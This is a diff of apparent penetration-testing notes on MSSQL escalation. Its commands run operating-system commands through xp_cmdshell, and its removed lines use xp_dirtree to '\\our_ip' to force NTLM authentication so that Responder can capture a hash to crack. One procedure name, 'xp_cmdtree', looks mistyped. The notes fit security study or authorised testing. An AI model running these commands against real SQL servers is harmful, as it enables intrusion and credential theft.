AndreMIsidoro/escalations/mssql_enumeration.md

-	EXEC xp_cmdshell 'net user'; # This allows us to execute commands. exec xp_cmdtree 'whoami'; # This allows us to execute commands. exec xp_dirtree 'c:\'; # Checks if we can list files if this is successful we can now try to do a request back to us exec xp_dirtree '\\our_ip\test\test';
+	EXEC xp_cmdshell 'net user'; # This allows us to execute commands. exec xp_cmdtree 'whoami'; # This allows us to execute commands.
-	we can check if we receive the request with nc.
-This request will attempt a ntlm authentication, so we can start responder to get the hash and then try to crack it

 If we cant use it we need to activate it.